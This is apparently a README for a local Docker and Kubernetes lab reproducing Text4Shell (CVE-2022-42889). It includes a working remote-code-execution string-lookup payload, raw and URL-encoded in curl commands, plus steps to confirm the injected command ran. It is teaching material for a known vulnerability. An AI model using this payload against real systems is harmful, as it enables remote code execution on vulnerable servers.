# Text4Shell CVE-2022-42889

## Docker Lab for CVE-2022-42889

> You can either build the Docker image locally or pull the image from Docker Hub and run the container.

### Clone the repo

git clone

### Build the Docker image locally

docker build --tag=text4shell .

### Run the Docker container

docker run -d --rm -p 8080:8080 text4shell

### Or pull the image from Docker Hub and run the container

docker pull devenes/text4shell:v1.0
docker run -d --rm -p 8080:8080 devenes/text4shell:v1.0

### Test the app by passing a string to the `search` parameter:

curl http://localhost/text4shell/attack?search=<anything>

- Attack can be performed by passing a string `${prefix:name}` where the prefix is the aforementioned lookup:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

### Attack using `curl`:

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

- You can also try using `dns` or `url` prefixes

### Get the container id

docker container ls

### Get into the container

docker exec -it <container_id> bash

### Check if the RCE attack was successful

- You should see a file named `foo` created in the `/tmp` directory:

ls /tmp/

### You can stop the container by running the following command

docker container stop <container_id>

## Kubernetes Lab for CVE-2022-42889

### Change the directory to `kubernetes` and follow the instructions in the `` file.

cd kubernetes

### Create kind cluster

kind create cluster --config kind-config.yaml

### Deploy the vulnerable app to the cluster

kubectl apply -f deployment.yaml

### Create a service to expose the app

kubectl apply -f service.yaml

### Attack the vulnerable app using `curl`

curl -X GET "http://localhost:8080/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D"

### Get the pod name using `kubectl get pods`

kubectl get pods

### Get into the pod using `kubectl exec`

kubectl exec -it $(kubectl get pods | grep text4shell |awk '{print $1}') -- bash

### Check if the attack was successful

ls /tmp/ | grep foo

### You can find the detailed tutorial on my [Udemy course here](


